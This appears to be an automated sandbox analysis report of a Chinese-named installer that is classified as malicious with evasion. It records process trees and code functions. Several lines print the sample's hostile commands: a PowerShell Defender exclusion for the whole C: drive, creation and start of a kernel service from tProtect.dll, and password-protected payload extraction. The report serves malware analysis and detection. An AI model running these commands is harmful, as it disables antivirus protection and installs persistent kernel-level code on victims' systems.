Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA1FAA012_2_6CA1FAA0
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA1BAD012_2_6CA1BAD0
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA1DA5012_2_6CA1DA50
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6C9C340A12_2_6C9C340A
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA2D5C012_2_6CA2D5C0
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6C9ED5EC12_2_6C9ED5EC
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA276E012_2_6CA276E0
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA3D64012_2_6CA3D640
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA1965012_2_6CA19650
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA417C012_2_6CA417C0
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA4770012_2_6CA47700
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6C9C109212_2_6C9C1092
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA2D05012_2_6CA2D050
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA251F012_2_6CA251F0
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA34AF012_2_6CA34AF0
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6CA3175012_2_6CA31750
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_009F81EC17_2_009F81EC
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A381C017_2_00A381C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A4824017_2_00A48240
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A2425017_2_00A24250
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A4C3C017_2_00A4C3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A404C817_2_00A404C8
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A2865017_2_00A28650
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A0094317_2_00A00943
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A2C95017_2_00A2C950
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A28C2017_2_00A28C20
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A44EA017_2_00A44EA0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A40E0017_2_00A40E00
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A110AC17_2_00A110AC
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A3D08917_2_00A3D089
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A3518017_2_00A35180
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A491C017_2_00A491C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A2D1D017_2_00A2D1D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A4112017_2_00A41120
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A4D2C017_2_00A4D2C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A153F317_2_00A153F3
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_009B53CF17_2_009B53CF
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_009FD49617_2_009FD496
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A454D017_2_00A454D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A4D47017_2_00A4D470
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_009B157217_2_009B1572
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A4155017_2_00A41550
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A3D6A017_2_00A3D6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A0965217_2_00A09652
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_009B97CA17_2_009B97CA
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_009C976617_2_009C9766
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A4D9E017_2_00A4D9E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_009B1AA117_2_009B1AA1
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A35E8017_2_00A35E80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A35F8017_2_00A35F80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_009CE00A17_2_009CE00A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A322E017_2_00A322E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A5230017_2_00A52300
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A1E49F17_2_00A1E49F
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A325F017_2_00A325F0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A2A6A017_2_00A2A6A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A266D017_2_00A266D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A4E99017_2_00A4E990
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A32A8017_2_00A32A80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A0AB1117_2_00A0AB11
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A36CE017_2_00A36CE0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A370D017_2_00A370D0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A2B18017_2_00A2B180
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A1B12117_2_00A1B121
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A4720017_2_00A47200
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A3F3A017_2_00A3F3A0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A4F3C017_2_00A4F3C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_009DB3E417_2_009DB3E4
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A3F42017_2_00A3F420
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A2741017_2_00A27410
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A4F59917_2_00A4F599
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A4353017_2_00A43530
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A2F50017_2_00A2F500
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A5351A17_2_00A5351A
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A5360117_2_00A53601
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A2379017_2_00A23790
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A477C017_2_00A477C0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_009DF8E017_2_009DF8E0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A2F91017_2_00A2F910
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A03AEF17_2_00A03AEF
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A37AF017_2_00A37AF0
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_009CBAC917_2_009CBAC9
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_009CBC9217_2_009CBC92
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A37C5017_2_00A37C50
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_00A2FDF017_2_00A2FDF0
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess token adjusted: SecurityJump to behavior
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 009B1E40 appears 150 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 00A4FB10 appears 723 times
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: String function: 009B28E3 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: String function: 6CA44F10 appears 673 times
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: String function: 6C9A7240 appears 49 times
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.3.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.11.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.11.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exeStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp.3.drStatic PE information: Number of sections : 11 > 10
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, 00000003.00000003.1281432231.000000007FA1A000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.7.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, 00000003.00000003.1280532280.000000000300E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.7.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exe, 00000003.00000000.1278158552.0000000000A39000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFileNameSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.7.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exeBinary or memory string: OriginalFileNameSRClient.exe vs #U5b89#U88c5#U52a9#U624b_2.0.7.exe
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.19.drBinary string: \Device\TfSysMon
Source: tProtect.dll.19.drBinary string: \Device\TfKbMonPWLCache
Source: classification engineClassification label: mal92.evad.winEXE@125/32@1/0
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6C974B80 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction,12_2_6C974B80
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_009B9313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,17_2_009B9313
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_009C3D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,17_2_009C3D66
Source: C:\Program Files (x86)\Windows NT\7zr.exeCode function: 17_2_009B9252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW,17_2_009B9252
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpCode function: 12_2_6C974050 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,Process32NextW,12_2_6C974050
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpFile created: C:\Program Files (x86)\Windows NT\is-S1M3N.tmpJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7456:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8052:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8120:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4928:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7864:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7880:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7852:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7988:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3920:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1660:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7768:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8188:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7992:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8160:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:4268:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7664:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7828:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7708:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3256:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6764:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6560:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6912:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8060:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6028:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7724:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7228:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1056:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7916:120:WilError_03
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exeFile created: C:\Users\user~1\AppData\Local\Temp\is-FL87A.tmpJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000004149000.00000004.00001000.00020000.00000000.sdmp, is-H48MF.tmp.12.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000004149000.00000004.00001000.00020000.00000000.sdmp, is-H48MF.tmp.12.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000004149000.00000004.00001000.00020000.00000000.sdmp, is-H48MF.tmp.12.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000004149000.00000004.00001000.00020000.00000000.sdmp, is-H48MF.tmp.12.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000004149000.00000004.00001000.00020000.00000000.sdmp, is-H48MF.tmp.12.drBinary or memory string: SELECT data FROM %Q.'%q_node' WHERE nodeno=?Node %lld missing from databaseNode %lld is too small (%d bytes)Rtree depth out of range (%d)Node %lld is too small for cell count of %d (%d bytes)Dimension %d of cell %d on node %lld is corruptDimension %d of cell %d on node %lld is corrupt relative to parentwrong number of arguments to function rtreecheck()SELECT * FROM %Q.'%q_rowid'Schema corrupt or not an rtree_rowid_parentENDSELECT count(*) FROM %Q.'%q_%s'cannot open value of type %sno such rowid: %lldforeign keyindexedcannot open virtual table: %scannot open table without rowid: %scannot open view: %sno such column: "%s"cannot open %s column for writingblockDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';version%s_nodedata_shape does not contain a valid polygon
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000004149000.00000004.00001000.00020000.00000000.sdmp, is-H48MF.tmp.12.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000004149000.00000004.00001000.00020000.00000000.sdmp, is-H48MF.tmp.12.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000004149000.00000004.00001000.00020000.00000000.sdmp, is-H48MF.tmp.12.drBinary or memory string: SELECT %s WHERE rowid = ?SELECT rowid, rank FROM %Q.%Q ORDER BY %s("%w"%s%s) %sinvalid rootpageorphan indexsqlite_stat%dDELETE FROM %Q.%s WHERE %s=%QDELETE FROM %Q.sqlite_master WHERE name=%Q AND type='trigger'corrupt schemaUPDATE %Q.sqlite_master SET rootpage=%d WHERE #%d AND rootpage=#%dstattable %s may not be droppeduse DROP TABLE to delete table %suse DROP VIEW to delete view %stblDELETE FROM %Q.sqlite_sequence WHERE name=%QDELETE FROM %Q.sqlite_master WHERE tbl_name=%Q and type!='trigger' UNIQUEindexcannot create a TEMP index on non-TEMP table "%s"table %s may not be indexedviews may not be indexedvirtual tables may not be indexedthere is already a table named %sindex %s already existssqlite_autoindex_%s_%dexpressions prohibited in PRIMARY KEY and UNIQUE constraintsconflicting ON CONFLICT clauses specifiedCREATE%s INDEX %.*sINSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);name='%q' AND type='index'table "%s" has more than one primary keyAUTOINCREMENT is only allowed on an INTEGER PRIMARY KEYTABLEVIEW
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.tmp, 00000006.00000003.1350543145.0000000004149000.00000004.00001000.00020000.00000000.sdmp, is-H48MF.tmp.12.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exeVirustotal: Detection: 9%
Source: #U5b89#U88c5#U52a9#U624b_2.0.7.exeString found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exeFile read: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exeJump to behavior
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
Source: unknownProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe"
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exeProcess created: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp "C:\Users\user~1\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$10428,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe"
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -s W32Time
Source: C:\Users\user\AppData\Local\Temp\is-FL87A.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exeProcess created: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp "C:\Users\user~1\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmp" /SL5="$3043E,4740784,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b_2.0.7.exe" /VERYSILENT
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-LRFVE.tmp\#U5b89#U88c5#U52a9#U624b_2.0.7.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
